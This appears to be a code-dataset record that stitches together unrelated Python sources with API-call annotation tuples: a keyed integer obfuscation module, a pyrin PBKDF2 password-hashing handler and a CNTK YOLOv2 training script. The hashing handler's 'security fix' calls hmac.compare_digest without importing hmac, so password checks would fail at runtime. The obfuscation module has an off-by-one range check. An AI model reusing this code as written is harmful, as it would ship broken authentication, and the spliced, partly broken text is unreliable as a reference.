'os.path.isfile', 'os.path.isfile', (['emissmat_path'], {}), '(emissmat_path)\n', (3606, 3621), False, 'import os\n'), ((5008, 5201), 'torch.utils.data.DataLoader', 'DataLoader', ([], {'dataset': 'dataset', 'batch_size': 'self._config.lm_batch_size', 'collate_fn': '(self._collate_fn if self._collate_fn is not None else default_collate_fn)', 'shuffle': 'shuffle', 'drop_last': '(False)'}), '(dataset=dataset, batch_size=self._config.lm_batch_size,\n collate_fn=self._collate_fn if self._collate_fn is not None else\n default_collate_fn, shuffle=shuffle, drop_last=False)\n', (5018, 5201), False, 'from torch.utils.data import DataLoader\n'), ((7581, 7626), 
'os.path.join', 'os.path.join', (['output_dir', 'f"""{model_name}.bin"""'], {}), "(output_dir, f'{model_name}.bin')\n", (7593, 7626), False, 'import os\n'), ((11975, 12024), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{file_name}-inter.pt"""'], {}), "(output_dir, f'{file_name}-inter.pt')\n", (11987, 12024), False, 'import os\n'), ((12037, 12090), 'torch.save', 'torch.save', (['valid_results.__dict__', 'inter_result_file'], {}), '(valid_results.__dict__, inter_result_file)\n', (12047, 12090), False, 'import torch\n'), ((16361, 16403), 'numpy.random.dirichlet', 'np.random.dirichlet', (['(trans_counts2 + 1e-10)'], {}), '(trans_counts2 + 1e-10)\n', (16380, 16403), True, 'import numpy as np\n'), ((2673, 2698), 'torch.load', 'torch.load', (['transmat_path'], {}), '(transmat_path)\n', (2683, 2698), False, 'import torch\n'), ((3351, 3398), 'torch.save', 'torch.save', (['self._init_trans_mat', 'transmat_path'], {}), '(self._init_trans_mat, transmat_path)\n', (3361, 3398), False, 'import torch\n'), ((3735, 3760), 'torch.load', 'torch.load', (['emissmat_path'], {}), '(emissmat_path)\n', (3745, 3760), False, 'import torch\n'), ((4546, 4593), 'torch.save', 'torch.save', (['self._init_emiss_mat', 'emissmat_path'], {}), '(self._init_emiss_mat, emissmat_path)\n', (4556, 4593), False, 'import torch\n'), ((7829, 7878), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{optimizer_name}.bin"""'], {}), "(output_dir, f'{optimizer_name}.bin')\n", (7841, 7878), False, 'import os\n'), ((7965, 8023), 'os.path.join', 'os.path.join', (['output_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(output_dir, f'{pretrain_optimizer_name}.bin')\n", (7977, 8023), False, 'import os\n'), ((9193, 9237), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{model_name}.bin"""'], {}), "(input_dir, f'{model_name}.bin')\n", (9205, 9237), False, 'import os\n'), ((9485, 9533), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{optimizer_name}.bin"""'], {}), "(input_dir, 
f'{optimizer_name}.bin')\n", (9497, 9533), False, 'import os\n'), ((9830, 9887), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(input_dir, f'{pretrain_optimizer_name}.bin')\n", (9842, 9887), False, 'import os\n'), ((9616, 9664), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{optimizer_name}.bin"""'], {}), "(input_dir, f'{optimizer_name}.bin')\n", (9628, 9664), False, 'import os\n'), ((9979, 10036), 'os.path.join', 'os.path.join', (['input_dir', 'f"""{pretrain_optimizer_name}.bin"""'], {}), "(input_dir, f'{pretrain_optimizer_name}.bin')\n", (9991, 10036), False, 'import os\n')] |
from random import Random
from collections_extended import setlist
# The version of seeding to use for random
SEED_VERSION = 2
# Common alphabets to use
ALPHANUM = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
BASE58 = '123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz'
def shuffle(key, x):
random = Random(key)
random.shuffle(x)
def key_gen(key, base):
'''Generate values from the key.
This will indefinitely generate integers in [0, base).
key is used to initialize random, so that the "random" number generated are
the same each time for a given key. This turns a key of any length into an
"infinitely" long key without simply cycling over the key.
'''
random = Random(key)
while True:
value = random.randint(0, base-1)
yield value
def encode_base_n(num, base, min_length=0):
'''Convert an integer into a list of integers storing the number in base base.
If a minimum length is specified, the result will be 0-padded.
'''
out = []
while num > 0 or len(out) < min_length:
num, remainder = divmod(num, base)
out.append(remainder)
return out
def decode_base_n(int_list, base):
'''Convert a list of numbers representing a number in base base to an integer.'''
out = 0
for index, num in enumerate(int_list):
if num >= base or num < 0:
raise ValueError
out += (base ** index) * num
return out
def calc_check_digits(int_list, base, num_check_chars):
checksum_base = base ** num_check_chars
checksum_value = sum(int_list) % checksum_base
return encode_base_n(checksum_value, base, min_length=num_check_chars)
def add_check_digits(int_list, base, num_check_chars):
'''Calculate a checksum for int_list and translate into a number of base base
made up of num_check_chars digits.
Args:
int_list: A list of integers >= 0 and < base
base: The number of characters in the alphabet
num_check_chars: The number of check characters to return
Returns:
A list of integers that represent the checksum in base base.
'''
check_digits = calc_check_digits(int_list, base, num_check_chars)
return int_list + check_digits
def eval_check_digits(decrypted_ints, base, num_check_chars):
'''Evaluate the check digits in decrypted_ints.
Args:
decrypted_ints: A list of integers >=0 and < base (the result of add_check_digits)
Returns:
The decrypted_ints without the check digits
Raises:
ValueError: if the check digits don't match
'''
if num_check_chars == 0:
return decrypted_ints
int_list = decrypted_ints[:-num_check_chars]
check_digits = decrypted_ints[-num_check_chars:]
if calc_check_digits(int_list, base, num_check_chars) != check_digits:
raise ValueError()
return int_list
def encode(int_list, alphabet):
'''Encode ints using alphabet.'''
char_list = []
for i in int_list:
if i > len(alphabet) or i < 0:
raise ValueError
char_list.append(alphabet[i])
return ''.join(char_list)
def decode(s, alphabet):
'''Decode a string s using alphabet returning a list of ints.'''
try:
return [alphabet.index(c) for c in s]
except (TypeError, IndexError):
raise ValueError
def encrypt(int_list, key, base):
encrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
encrypted_int = (char_index + key_value + moving_value) % base
encrypted_ints.append(encrypted_int)
moving_value += encrypted_int
return encrypted_ints
def decrypt(int_list, key, base):
decrypted_ints = []
moving_value = 0
for char_index, key_value in zip(int_list, key_gen(key, base)):
decrypted_int = (char_index - key_value - moving_value) % base
decrypted_ints.append(decrypted_int)
moving_value += char_index
return decrypted_ints
def obfuscate(num, key, alphabet, min_chars=0, num_check_chars=1):
''' Obfuscate num using key.
This does some minor encryption by adding values to a key and a moving value.
The moving value is so that one small change makes all of the resulting
characters change.
Args:
num: The integer to obfuscate
key: An int, string or bytes to generate key values (anything that can be passed to random.seed)
alphabet: A list of characters to use for the alphabet
min_chars: A minimum number of chars for the resulting string
num_check_chars: The number of chars to use as a check
Returns:
A string encoding the number in the passed alphabet and encrypted with key.
Raises:
ValueError: if num is not a number or < 0
'''
try:
if num < 0:
raise ValueError()
except TypeError:
raise ValueError()
base = len(alphabet)
num_as_ints = encode_base_n(num, base, min_chars)
unencrypted_digits = add_check_digits(num_as_ints, base, num_check_chars)
encrypted_digits = encrypt(unencrypted_digits, key, base)
return encode(encrypted_digits, alphabet)
def deobfuscate(s, key, alphabet, num_check_chars=1):
'''Deobfuscate a string using key and alphabet.
key, alphabet and num_check_chars must be identical to the values used to obfuscate.
Args:
s: The string to deobfuscate
key: The key used to obfuscate
alphabet: The alphabet used to obfuscate
num_check_chars: The number of chars to use as a check
Returns:
The deobfuscated integer.
Raises:
ValueError: if s isn't a string, s doesn't use alphabet or the checksum doesn't match
'''
base = len(alphabet)
encrypted_ints = decode(s, alphabet)
decrypted_ints = decrypt(encrypted_ints, key, base)
num_as_ints = eval_check_digits(decrypted_ints, base, num_check_chars)
return decode_base_n(num_as_ints, base)
class Obfuscator():
def __init__(self, key, alphabet=None, min_length=0, num_check_chars=1, version=1):
'''
This accepts a version number in case the algorithm changes at some point
in the future.
Args:
key: The key.
alphabet: Optionally, specify an alternative alphabet to use.
min_length: An encoded value will always be at least min_length
characters (including the check characters)
num_check_chars: The number of chars used for the check
version: The version of the algorithm to use.
'''
if isinstance(num_check_chars, int) and num_check_chars >= 0:
self.num_check_chars = num_check_chars
else:
raise ValueError('num_check_chars must be an int >= 0')
if isinstance(min_length, int) and min_length >= 0:
self.min_length = min_length - num_check_chars
else:
raise ValueError('min_length must be an int >= 0')
self.key = key
alphabet = list(alphabet or ALPHANUM)
shuffle(key, alphabet)
self.alphabet = setlist(alphabet)
def obfuscate(self, num, salt=None, min_length=None):
if salt:
key = self.key + salt
else:
key = self.key
if min_length is None:
min_length = self.min_length
return obfuscate(num, key, self.alphabet, min_length, self.num_check_chars)
def deobfuscate(self, s, salt=None):
if salt:
key = self.key + salt
else:
key = self.key
return deobfuscate(s, key, self.alphabet, self.num_check_chars)
| [
"random.Random",
"collections_extended.setlist"
] | [((336, 347), 'random.Random', 'Random', (['key'], {}), '(key)\n', (342, 347), False, 'from random import Random\n'), ((711, 722), 'random.Random', 'Random', (['key'], {}), '(key)\n', (717, 722), False, 'from random import Random\n'), ((6443, 6460), 'collections_extended.setlist', 'setlist', (['alphabet'], {}), '(alphabet)\n', (6450, 6460), False, 'from collections_extended import setlist\n')] |
# -*- coding: utf-8 -*-
"""
pbkdf2 hashing handler module.
"""
import hashlib
import re
import pyrin.configuration.services as config_services
import pyrin.security.utils.services as security_utils_services
from pyrin.security.hashing.decorators import hashing
from pyrin.security.hashing.handlers.base import HashingBase
from pyrin.security.hashing.handlers.exceptions import InvalidHashingRoundsCountError, \
InvalidPBKDF2InternalAlgorithmError, InvalidHashingSaltLengthError
@hashing()
class PBKDF2Hashing(HashingBase):
    """
    pbkdf2 hashing class.
    """

    # regular expression to validate format of full hashed values.
    # the following format will be matched:
    # `$handler_name$internal_algorithm$rounds$salt_length$salt-text_plus_salt_hash`
    FORMAT_REGEX = re.compile(r'^\$PBKDF2\$[^$]+\$[\d]+\$[\d]+\$(.+)$')

    def __init__(self, **options):
        """
        initializes an instance of PBKDF2Hashing.
        """

        super().__init__(**options)

    def _generate_hash(self, text, **options):
        """
        gets the hash of input text using a random or specified salt.

        :param str text: text to be hashed.

        :keyword bytes salt: salt to be used for hashing.
                             if not provided, a random salt will be generated
                             considering `salt_length` option.

        :keyword str internal_algorithm: internal algorithm to be used
                                         for hashing. if not provided,
                                         default value from relevant
                                         config will be used.

        :keyword int rounds: rounds to perform for generating hash.
                             if not provided, default value from
                             relevant config will be used.

        :keyword int salt_length: salt length to be used for hashing.
                                  if `salt` option is provided, then
                                  this value will be ignored.
                                  if not provided, default value from
                                  relevant config will be used.

        :rtype: bytes
        """

        internal_algorithm, rounds, salt_length = self._extract_attributes(**options)
        self._validate_attributes(internal_algorithm, rounds, salt_length)

        salt = options.get('salt', None)
        if salt is None:
            salt = self._generate_salt(length=salt_length)

        text_hash = hashlib.pbkdf2_hmac(internal_algorithm,
                                        text.encode(self._encoding),
                                        salt,
                                        rounds)

        return self._make_final_hash(internal_algorithm, rounds, salt, text_hash)

    def _generate_salt(self, **options):
        """
        generates a valid salt for this handler and returns it.

        :keyword int length: length of generated salt in bytes.
                             if not provided, default value from
                             relevant config will be used.

        :rtype: bytes
        """

        salt_length = options.get('length', config_services.get('security', 'hashing',
                                                                'pbkdf2_salt_length'))

        return security_utils_services.get_bytes(length=salt_length)

    def _is_match(self, text, hashed_value, **options):
        """
        gets a value indicating that given text's
        hash is identical to given hashed value.

        :param str text: text to be hashed.
        :param bytes hashed_value: hashed value to compare with.

        :rtype: bool
        """

        internal_algorithm, rounds, salt, text_hash = \
            self._extract_parts_from_final_hash(hashed_value, **options)

        new_full_hashed_value = self._generate_hash(text,
                                                    internal_algorithm=internal_algorithm,
                                                    rounds=rounds, salt=salt)

        # security fix: use a constant-time comparison instead of `==` so an
        # attacker cannot learn how many leading bytes match via timing.
        return hmac.compare_digest(hashed_value, new_full_hashed_value)

    def _get_algorithm(self, **options):
        """
        gets the hashing algorithm.

        :rtype: str
        """

        return 'PBKDF2'

    def _get_separator_count(self):
        """
        gets the separator count used between parts of this handler's hashed result.

        :rtype: int
        """

        return 5

    def _extract_attributes(self, **options):
        """
        extracts the required attributes for this handler from input
        keyword arguments. if not available, gets the default
        values from relevant configs.

        :keyword str internal_algorithm: internal algorithm to be used
                                         for hashing. if not provided,
                                         default value from relevant
                                         config will be used.

        :keyword int rounds: rounds to perform for generating hash.
                             if not provided, default value from
                             relevant config will be used.

        :keyword int salt_length: salt length to be used for hashing.
                                  if not provided, default value from
                                  relevant config will be used.

        :returns: tuple[str internal_algorithm, int rounds, int salt_length]
        :rtype: tuple[str, int, int]
        """

        internal_algorithm = options.get('internal_algorithm',
                                         config_services.get('security', 'hashing',
                                                             'pbkdf2_internal_algorithm'))
        rounds = options.get('rounds', config_services.get('security', 'hashing',
                                                           'pbkdf2_rounds'))
        salt_length = options.get('salt_length', config_services.get('security', 'hashing',
                                                                     'pbkdf2_salt_length'))

        return internal_algorithm, rounds, salt_length

    def _validate_attributes(self, internal_algorithm, rounds, salt_length):
        """
        validates the given inputs for hash generation.
        it will raise an error on invalid inputs.

        :param str internal_algorithm: internal algorithm to be used for hashing.
        :param int rounds: rounds to perform for generating hash.
        :param int salt_length: salt length to be used for hashing.

        :raises InvalidPBKDF2InternalAlgorithmError: invalid pbkdf2 internal algorithm error.
        :raises InvalidHashingRoundsCountError: invalid hashing rounds count error.
        :raises InvalidHashingSaltLengthError: invalid hashing salt length error.
        """

        if internal_algorithm not in hashlib.algorithms_guaranteed:
            raise InvalidPBKDF2InternalAlgorithmError('Internal algorithm [{algorithm}] '
                                                      'is invalid.'
                                                      .format(algorithm=internal_algorithm))

        if rounds < 1:
            raise InvalidHashingRoundsCountError('Hashing rounds [{rounds}] is invalid.'
                                                 .format(rounds=rounds))

        if salt_length < 1:
            raise InvalidHashingSaltLengthError('Salt length [{length}] is invalid.'
                                                .format(length=salt_length))

    def _make_final_hash(self, internal_algorithm, rounds, salt, text_hash):
        """
        makes final hash from input values and returns it.

        :param str internal_algorithm: internal algorithm to be used for hashing.
        :param int rounds: rounds to perform for generating hash.
        :param bytes salt: salt to be used for hashing.
        :param bytes text_hash: hash value of text and salt.

        :rtype: bytes
        """

        # the result starts with a separator so the split in
        # `_extract_parts_from_final_hash` yields an empty first part.
        return self._get_separator() + self._get_separator().join(
            (self._get_algorithm().encode(self._encoding),
             internal_algorithm.encode(self._encoding),
             str(rounds).encode(self._encoding),
             str(len(salt)).encode(self._encoding),
             self._encode_hash_part(salt + text_hash)))

    def _extract_parts_from_final_hash(self, full_hashed_value, **options):
        """
        extracts different parts of given full hashed value.

        :param bytes full_hashed_value: full hashed value to extract it's parts.

        :returns: tuple[str internal_algorithm, int rounds, bytes salt, bytes text_hash]
        :rtype: tuple[str, int, bytes, bytes]
        """

        # `empty` and `handler` are unused but document the on-disk layout.
        empty, handler, internal_algorithm, rounds, salt_length, salt_plus_text_hash = \
            full_hashed_value.split(self._get_separator(), self._get_separator_count())

        salt_length = int(salt_length)
        raw_salt_plus_text_hash = self._decode_hash_part(salt_plus_text_hash)
        salt = raw_salt_plus_text_hash[:salt_length]
        text_hash = raw_salt_plus_text_hash[salt_length:]

        return internal_algorithm.decode(self._encoding), int(rounds), salt, text_hash

    def _get_hashed_part(self, full_hashed_value, **options):
        """
        gets the hashed part from full hashed value which current handler understands it.
        this handler returns the same input value as result.

        :param bytes full_hashed_value: full hashed value to get hashed part from it.

        :rtype: bytes
        """

        return full_hashed_value
| [
"pyrin.configuration.services.get",
"pyrin.security.hashing.decorators.hashing",
"pyrin.security.utils.services.get_bytes",
"re.compile"
] | [((488, 497), 'pyrin.security.hashing.decorators.hashing', 'hashing', ([], {}), '()\n', (495, 497), False, 'from pyrin.security.hashing.decorators import hashing\n'), ((790, 848), 're.compile', 're.compile', (['"""^\\\\$PBKDF2\\\\$[^$]+\\\\$[\\\\d]+\\\\$[\\\\d]+\\\\$(.+)$"""'], {}), "('^\\\\$PBKDF2\\\\$[^$]+\\\\$[\\\\d]+\\\\$[\\\\d]+\\\\$(.+)$')\n", (800, 848), False, 'import re\n'), ((3331, 3384), 'pyrin.security.utils.services.get_bytes', 'security_utils_services.get_bytes', ([], {'length': 'salt_length'}), '(length=salt_length)\n', (3364, 3384), True, 'import pyrin.security.utils.services as security_utils_services\n'), ((3185, 3249), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_salt_length"""'], {}), "('security', 'hashing', 'pbkdf2_salt_length')\n", (3204, 3249), True, 'import pyrin.configuration.services as config_services\n'), ((5574, 5645), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_internal_algorithm"""'], {}), "('security', 'hashing', 'pbkdf2_internal_algorithm')\n", (5593, 5645), True, 'import pyrin.configuration.services as config_services\n'), ((5748, 5807), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_rounds"""'], {}), "('security', 'hashing', 'pbkdf2_rounds')\n", (5767, 5807), True, 'import pyrin.configuration.services as config_services\n'), ((5918, 5982), 'pyrin.configuration.services.get', 'config_services.get', (['"""security"""', '"""hashing"""', '"""pbkdf2_salt_length"""'], {}), "('security', 'hashing', 'pbkdf2_salt_length')\n", (5937, 5982), True, 'import pyrin.configuration.services as config_services\n')] |
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 28 13:03:05 2017
@author: <NAME>
"""
import cntk as C
import _cntk_py
import cntk.layers
import cntk.initializer
import cntk.losses
import cntk.metrics
import cntk.logging
import cntk.io.transforms as xforms
import cntk.io
import cntk.train
import os
import numpy as np
import yolo2
import CloneModel
# default Paths relative to current python file.
abs_path = os.path.dirname(os.path.abspath(__file__))
model_path = os.path.join(abs_path, "Models")  # checkpoints and logs are written here

# model dimensions
image_height = 416
image_width = 416
num_channels = 3 # RGB
num_truth_boxes = 14  # maximum ground-truth boxes per image in the ROI stream
box_dim = 5 # centerX, centerY, Width, Height, class_type
num_classes = 3 # object type count. i.e. tomato, flower, stem, et, al.
num_anchors = 5  # number of YOLOv2 anchor boxes (must match anchor.txt rows)
model_name = "Yolo2Net.model"
# Create a minibatch source.
def create_image_mb_source(image_file, rois_file, is_training, total_number_of_samples):
    """Build a composite CNTK MinibatchSource for images plus ROI labels.

    Arguments:
        image_file: image map file (path<TAB>label per line).
        rois_file: CTF file with a `rois` stream of num_truth_boxes*box_dim values.
        is_training: enables color jitter and randomization when True.
        total_number_of_samples: sample budget handed to the source.

    Raises RuntimeError when either input file is missing.
    """
    for required_file in (image_file, rois_file):
        if not os.path.exists(required_file):
            raise RuntimeError("File '%s' does not exist." %required_file)

    # Scale every image to the fixed network input size; add color jitter
    # only while training.
    transforms = [xforms.scale(width=image_width, height=image_height,
                               channels=num_channels, interpolations='linear')]
    if is_training:
        transforms.append(xforms.color(brightness_radius=0.2, contrast_radius=0.2,
                                       saturation_radius=0.2))

    image_streams = cntk.io.StreamDefs(
        features=cntk.io.StreamDef(field='image', transforms=transforms),
        ignored=cntk.io.StreamDef(field='label', shape=1))
    image_reader = cntk.io.ImageDeserializer(image_file, image_streams)

    roi_streams = cntk.io.StreamDefs(
        rois=cntk.io.StreamDef(field='rois', shape=num_truth_boxes*box_dim))
    roi_reader = cntk.io.CTFDeserializer(rois_file, roi_streams)

    return cntk.io.MinibatchSource([image_reader, roi_reader],
                                   randomize=is_training,
                                   max_samples=total_number_of_samples,
                                   multithreaded_deserializer=True)
# Create the network.
def create_yolo2net(anchor_dims = None):
    """Build the YOLOv2 network on top of a cloned DarkNet backbone.

    Arguments:
        anchor_dims: anchor box (width, height) pairs forwarded to the
            Yolo2 loss/metric user-functions.

    Returns a dict with the input variables ('feature', 'label'), the loss
    ('ce'), the metric ('pe') and the raw network output ('output').
    """
    # Input variables denoting the features and label data
    feature_var = C.input_variable((num_channels, image_height, image_width))
    label_var = C.input_variable((num_truth_boxes, box_dim))
    # Clone the pre-trained DarkNet feature extractor between the named
    # nodes 'mean_removed_input' and 'bn6e', feeding it our input variable.
    net = CloneModel.CloneModel('Models/DarkNet.model', 'mean_removed_input', 'bn6e',
                                cntk.ops.functions.CloneMethod.clone, feature_var)
    # Three 3x3x1024 detection conv layers, each followed by batch norm.
    det1 = cntk.layers.layers.Convolution2D((3,3), 1024,
                                init=cntk.initializer.he_normal(), pad=True,
                                activation=cntk.ops.leaky_relu,
                                name='det1')(net)
    detbn1 = cntk.layers.BatchNormalization(map_rank=1, name='detbn1')(det1)
    det2 = cntk.layers.layers.Convolution2D((3,3), 1024,
                                init=cntk.initializer.he_normal(), pad=True,
                                activation=cntk.ops.leaky_relu,
                                name='det2')(detbn1)
    detbn2 = cntk.layers.BatchNormalization(map_rank=1, name='detbn2')(det2)
    det3 = cntk.layers.layers.Convolution2D((3,3), 1024,
                                init=cntk.initializer.he_normal(), pad = True,
                                activation=cntk.ops.leaky_relu,
                                name='det3')(detbn2)
    detbn3 = cntk.layers.BatchNormalization(map_rank=1, name='detbn3')(det3)
    # Final 1x1 conv: (x, y, w, h, objectness + class scores) per anchor.
    z = cntk.layers.layers.Convolution2D((1,1), (5+num_classes) * num_anchors,
                                init=cntk.initializer.normal(0.01), pad = True,
                                name='output')(detbn3)
    # loss and metric
    ce = C.user_function(yolo2.Yolo2Error(z, label_var, class_size = num_classes, priors = anchor_dims))
    pe = C.user_function(yolo2.Yolo2Metric(z, label_var, class_size = num_classes, priors = anchor_dims,
                                metricMethod = yolo2.Yolo2MetricMethod.Avg_iou))
    cntk.logging.log_number_of_parameters(z) ; print()
    return {
        'feature': feature_var,
        'label': label_var,
        'ce' : ce,
        'pe' : pe,
        'output': z
    }
# Create trainer
def create_trainer(network, epoch_size, num_quantization_bits, printer, block_size, warm_up):
    """Create a distributed CNTK Trainer for the network.

    Arguments:
        network: dict from create_yolo2net ('output', 'ce', 'pe').
        epoch_size: samples per epoch, used by the learning-rate schedule.
        num_quantization_bits: gradient quantization for data-parallel SGD.
        printer: progress writer(s) passed to the Trainer.
        block_size: when not None, use block-momentum distributed learning.
        warm_up: samples trained non-distributed before parallelism kicks in.

    Raises RuntimeError when block momentum is combined with quantization.
    """
    # Set learning parameters: stepwise-decaying LR over the training run.
    lr_per_mb = [0.001]*25 + [0.0001]*25 + [0.00001]*25 + [0.000001]*25 + [0.0000001]
    lr_schedule = C.learning_rate_schedule(lr_per_mb, unit=C.learners.UnitType.minibatch, epoch_size=epoch_size)
    mm_schedule = C.learners.momentum_schedule(0.9)
    l2_reg_weight = 0.0005 # CNTK L2 regularization is per sample, thus same as Caffe
    if block_size != None and num_quantization_bits != 32:
        raise RuntimeError("Block momentum cannot be used with quantization, please remove quantized_bits option.")
    # Create learner
    local_learner = C.learners.momentum_sgd(network['output'].parameters, lr_schedule, mm_schedule, unit_gain=False, l2_regularization_weight=l2_reg_weight)
    # Since we reuse parameter settings (learning rate, momentum) from Caffe, we set unit_gain to False to ensure consistency
    # Create trainer: wrap the local learner in a distributed learner.
    if block_size != None:
        parameter_learner = cntk.train.distributed.block_momentum_distributed_learner(local_learner, block_size=block_size)
    else:
        parameter_learner = cntk.train.distributed.data_parallel_distributed_learner(local_learner, num_quantization_bits=num_quantization_bits, distributed_after=warm_up)
    return C.Trainer(network['output'], (network['ce'], network['pe']), parameter_learner, printer)
# Train and test
def train_and_test(network, trainer, train_source, test_source, minibatch_size, epoch_size, restore):
    """Run a CNTK training session with periodic checkpointing and testing.

    Arguments:
        network: dict from create_yolo2net (provides input variables).
        trainer: Trainer from create_trainer.
        train_source / test_source: MinibatchSources for train and test data.
        minibatch_size: samples per minibatch.
        epoch_size: samples per epoch (also the progress frequency).
        restore: resume from the checkpoint file when True.
    """
    # define mapping from input streams to network inputs
    input_map = {
        network['feature']: train_source.streams.features,
        network['label']: train_source.streams.rois
    }
    # Train all minibatches; checkpoints go to Models/<model_name>.
    cntk.train.training_session(
        trainer=trainer, mb_source = train_source,
        model_inputs_to_streams = input_map,
        mb_size = minibatch_size,
        progress_frequency=epoch_size,
        checkpoint_config = C.CheckpointConfig(filename=os.path.join(model_path, model_name), restore=restore),
        test_config= C.TestConfig(test_source, minibatch_size=minibatch_size)
    ).train()
# Train and evaluate the network.
def net_train_and_eval(train_data, train_rois, test_data, test_rois,
                       priors = None,
                       num_quantization_bits=32,
                       block_size=3200, warm_up=0,
                       minibatch_size=1,
                       epoch_size = 1281167,
                       max_epochs=1,
                       restore=True,
                       log_to_file=None,
                       num_mbs_per_log=None,
                       gen_heartbeat=True):
    """Build the YOLOv2 network, then train and evaluate it.

    Arguments:
        train_data / train_rois: image map and ROI files for training.
        test_data / test_rois: image map and ROI files for evaluation.
        priors: anchor box dimensions forwarded to the loss/metric.
        num_quantization_bits, block_size, warm_up: distributed-learner knobs.
        minibatch_size, epoch_size, max_epochs: training schedule.
        restore: resume from the last checkpoint when True.
        log_to_file: log file name created under model_path.
        num_mbs_per_log, gen_heartbeat: kept for interface compatibility;
            currently unused.
    """
    _cntk_py.set_computation_network_trace_level(0)
    log_printer = cntk.logging.progress_print.ProgressPrinter(
        freq=1,
        tag='Training',
        log_to_file = os.path.join(model_path, log_to_file),
        num_epochs=max_epochs)
    progress_printer = cntk.logging.progress_print.ProgressPrinter(freq=1, tag='Training',
                        num_epochs=max_epochs,test_freq=1)
    network = create_yolo2net(priors)
    trainer = create_trainer(network, epoch_size, num_quantization_bits,
                             [progress_printer, log_printer], block_size, warm_up)
    train_source = create_image_mb_source(train_data, train_rois, True,
                                          total_number_of_samples=max_epochs * epoch_size)
    # Bug fix: the test source previously read `train_rois`; use the test
    # ROI file that callers pass in.  (A stray no-op `train_source`
    # expression statement was also removed.)
    test_source = create_image_mb_source(test_data, test_rois, False,
                                         total_number_of_samples=cntk.io.FULL_DATA_SWEEP)
    train_and_test(network,
                   trainer,
                   train_source,
                   test_source,
                   minibatch_size,
                   epoch_size,
                   restore)
#
# get train sample size evaluate sample size
#
def get_sample_counts(train_file, test_file):
    """Return [train_count, test_count]: the number of lines in each file.

    A missing file contributes a count of 0.  Files are opened via a
    context manager so the handle is closed even if reading raises
    (the original leaked the handle in that case).
    """
    def _line_count(path):
        # One sample per line; a missing file means zero samples.
        if not os.path.exists(path):
            return 0
        with open(path) as handle:
            return len(handle.readlines())

    return [_line_count(train_file), _line_count(test_file)]
def open_anchor_file(anchor_file):
    """Parse anchor box dimensions from a tab-separated text file.

    Each non-blank line holds "width<TAB>height".  Returns an (N, 2)
    float32 numpy array.  Uses a context manager so the file handle is
    closed even if a line fails to parse (the original leaked it).
    """
    anchors = []
    with open(anchor_file) as handle:
        for line in handle:
            stripped = line.strip()
            if stripped:
                dims = stripped.split("\t")
                anchors.append([float(dims[0]), float(dims[1])])
    return np.array(anchors).astype(np.float32)
if __name__=='__main__':
    # Anchor boxes are mandatory: fail fast if the file is missing or short.
    anchor_data = 'anchor.txt'
    if not os.path.exists(anchor_data):
        raise RuntimeError("File '%s' does not exist." %anchor_data)
    anchors = open_anchor_file(anchor_data)
    if anchors.shape[0] < num_anchors:
        raise RuntimeError("Anchor dimension is less than %s" %num_anchors)
    # network = create_yolo2net(anchors)
    # cntk.logging.graph.plot(network['output'], 'yolo2.png')
    # NOTE(review): the test set deliberately reuses the training files
    # here — confirm this is intentional before relying on the test metric.
    train_data = 'train.txt'
    train_rois = 'train.rois.txt'
    test_data = 'train.txt'
    test_rois = 'train.rois.txt'
    sample_size = get_sample_counts(train_data, test_data)
    net_train_and_eval(train_data, train_rois, test_data, test_rois,
                       priors = anchors,
                       epoch_size=sample_size[0],
                       block_size = None,
                       minibatch_size = 32,
                       max_epochs = 130,
                       log_to_file = 'Yolo2Net.log')
    # Must call MPI finalize when process exits without exceptions
    cntk.train.distributed.Communicator.finalize()
| [
"os.path.exists",
"yolo2.Yolo2Metric",
"_cntk_py.set_computation_network_trace_level",
"cntk.Trainer",
"os.path.join",
"cntk.learners.momentum_sgd",
"yolo2.Yolo2Error",
"cntk.io.transforms.color",
"cntk.learners.momentum_schedule",
"cntk.input_variable",
"cntk.io.transforms.scale",
"numpy.arra... | [((469, 501), 'os.path.join', 'os.path.join', (['abs_path', '"""Models"""'], {}), "(abs_path, 'Models')\n", (481, 501), False, 'import os\n'), ((429, 454), 'os.path.abspath', 'os.path.abspath', (['__file__'], {}), '(__file__)\n', (444, 454), False, 'import os\n'), ((2267, 2326), 'cntk.input_variable', 'C.input_variable', (['(num_channels, image_height, image_width)'], {}), '((num_channels, image_height, image_width))\n', (2283, 2326), True, 'import cntk as C\n'), ((2343, 2387), 'cntk.input_variable', 'C.input_variable', (['(num_truth_boxes, box_dim)'], {}), '((num_truth_boxes, box_dim))\n', (2359, 2387), True, 'import cntk as C\n'), ((2399, 2529), 'CloneModel.CloneModel', 'CloneModel.CloneModel', (['"""Models/DarkNet.model"""', '"""mean_removed_input"""', '"""bn6e"""', 'cntk.ops.functions.CloneMethod.clone', 'feature_var'], {}), "('Models/DarkNet.model', 'mean_removed_input', 'bn6e',\n cntk.ops.functions.CloneMethod.clone, feature_var)\n", (2420, 2529), False, 'import CloneModel\n'), ((4334, 4432), 'cntk.learning_rate_schedule', 'C.learning_rate_schedule', (['lr_per_mb'], {'unit': 'C.learners.UnitType.minibatch', 'epoch_size': 'epoch_size'}), '(lr_per_mb, unit=C.learners.UnitType.minibatch,\n epoch_size=epoch_size)\n', (4358, 4432), True, 'import cntk as C\n'), ((4453, 4486), 'cntk.learners.momentum_schedule', 'C.learners.momentum_schedule', (['(0.9)'], {}), '(0.9)\n', (4481, 4486), True, 'import cntk as C\n'), ((4795, 4935), 'cntk.learners.momentum_sgd', 'C.learners.momentum_sgd', (["network['output'].parameters", 'lr_schedule', 'mm_schedule'], {'unit_gain': '(False)', 'l2_regularization_weight': 'l2_reg_weight'}), "(network['output'].parameters, lr_schedule,\n mm_schedule, unit_gain=False, 